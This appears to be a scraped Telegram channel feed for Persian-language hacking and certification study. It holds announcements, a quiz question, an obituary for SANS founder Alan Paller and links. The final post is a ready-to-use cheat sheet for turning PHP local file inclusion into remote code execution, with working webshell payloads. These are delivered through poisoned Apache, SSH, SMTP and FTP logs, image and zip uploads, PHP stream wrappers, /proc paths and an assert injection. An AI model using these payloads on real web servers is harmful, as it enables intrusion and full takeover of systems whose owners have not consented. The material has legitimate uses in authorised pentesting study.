Try Hack Box

Link Gp : گروه پرسش و پاسخ https://t.me/joinchat/1DA_sXnkk6thN2E0

سلام ممنون از دوستانی که همراه ما هستند درسته یکم دیر پست گذاشته میشه ولی سعی میشه تا جایی که بتونم کامل باشه شما هم دوره یا کتابی دارید میتونید با اون با ما پیش بیایید و اگه هم جایی مشکل داشتید در گروه که لینکشو زیر میزارم جوین شید مشکل خودتون بگید از سوال پرسیدن خجالت نکشید . این بحث CEH تموم شه و اگه تا آخرش ببینم واقعا حمایت شده از پست ها دوره ی بعدی Pwk هست البته قبلش هم کمی Linux کار میکنیم که دوستانی هم با لینوکس آشنایی ندارن تو دوره یا مطالب pwk به مشکل نخورند. هدف من آموزش رایگان هست برای جامعه سایبری پس برای دلگرمی هم شده حمایت کنید. با احترام مدیر کانال Unique_exploit @Unique_exploit

ما برای یادگیری به دنیا آمده‌ایم و جهان، معلم ماست. وقتی در درسی مردود می‌شویم باید دوباره ثبت نام کنیم. و دوباره! تا درس امروز را نیاموزیم به کلاس بالاتر نمی‌رویم. اگر در حال تجربه درسی تکراری هستيد، مشکل در درون شماست! اگر با هر مرد يا زنی آشنا می‌شويد خصوصیت مشخص و تکراری دارد يا اتفاق‌های مشابه می‌افتد؛ مشکل را درون خود جستجو کنيد! تا شما تغيير نکنيد، سر همين کلاس هستيد! - اندرو متيوس - راحت باش گیر نده @Flower_Red_Rose

یک همکار امنیتی در مورد یک حادثه اخیر گیج شده است. یک مهاجم با موفقیت به یک دستگاه در سازمان دسترسی پیدا کرد و با آن خارج شد برخی از داده های حساس اسکن کامل آسیب پذیری بلافاصله اجرا شد پس از سرقت چیزی کشف نشد. کدام یک از آنچه که ممکن است اتفاق افتاده باشد را به بهترین نحو توصیف می کند؟ #Questions

#Questions #سوالات

آلن پالر، موسس صنعت امنیت سایبری titan و موسسه SANS، درگذشت آقای پالر در صنعت امنیت سایبری پیشگام بود و از نیاز به آموزش و دانش بیشتر برای پزشکان دفاع می کرد. ترکیبی از اشتیاق، عقل، و سختگیری اخلاقی او در آوردن افراد ماهرتر به این حرفه مؤثر بود. او SANS، یک سازمان حرفه‌ای آموزش امنیت سایبری را که هر ساله بیش از 40000 فن‌آور امنیت سایبری را آموزش می‌دهد، در سال 1989 تأسیس کرد. ادامه شو میتونید از طریق لینک زیر مطالعه کنید : https://www.prnewswire.com/news-releases/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away-301422382.html Or https://www.sans.org/press/announcements/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away/ @unique_exploit

Thick Client Penetration Testing Methodology https://www.cyberark.com/resources/threat-research-blog/thick-client-penetration-testing-methodology #RedTeam #pentest @Network_PenetrationTesting

1. Apache Log Poisoning GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1 User-Agent: <?php system($_GET['c'])?> ——————————————————— 2. SSH Log Poisoning ssh '<?php system($_GET['c'])?>'@target .com /show.php?file=/var/log/auth.log&c=ls ——————————————————— 3. SMTP Log Poisoning telnet target(.)com 25 MAIL FROM:<email@gmail.com> RCPT TO:<?php system($_GET['c'])?> /show.php?file=/var/log/mail.log&c=ls ——————————————————— 4. Image Upload i. Add this to EXIF data of s.png: <?php system($_GET['c'])?> ii. Upload the s.png. iii. /show.php?file=../img/s.png&c=ls ——————————————————— 5. /proc/self/environ GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1 User-Agent: <?php system($_GET['c'])?> If no success then try writing files. ——————————————————— 6. php://filter Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE php://filter/convert.base64-encode/resource=index.php php://filter/read=string.rot13/resource=index.php "php://filter" is case insensitive. Try URL/Double encoding ——————————————————— 7. Zip upload echo "<?php system($_GET['c'])?>" > shell.php zip shell(.)zip shell.php mv shell(.)zip shell.jpg rm shell.php /show.php?file=zip://shell.jpg%23shell.php ——————————————————— 8. data://text/plain: /show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?> /show.php?file=data://text/plain,<?php phpinfo()?> /show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4= ——————————————————— 9. /proc/self/fd/{id} Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id} ——————————————————— 10. /proc/$PID/fd/$FD i. Upload a lot of shells. ii. /show.php?file=/proc/$PID/fd/$FD ——————————————————— 11. expect:// /show.php?page=expect://ls ——————————————————— 12. input:// POST /index.php?page=php://input HTTP/1.1 <?php system('ls')?> ——————————————————— 13. RCE via vulnerable assert statement Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!"); Payload: ' and die(system("whoami")) or ' ——————————————————— 14. Log files: /var/log/apache/{access.log or error.log} /var/log/apache2/error.log /usr/local/{apache or apache2}/log/error_log /var/log/nginx/{access.log or error.log} /var/log/httpd/error_log Insert payload via headers (User-Agent, Authorisation, Referrer etc) ——————————————————— 15. Via PHP sessions https://t.co/X18JJhXhGU?amp=1 ——————————————————— 16. vsftpd Log Poisoning: Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log ——————————————————— 17. To automate, Use LFISuite. —————————————————— @unique_exploit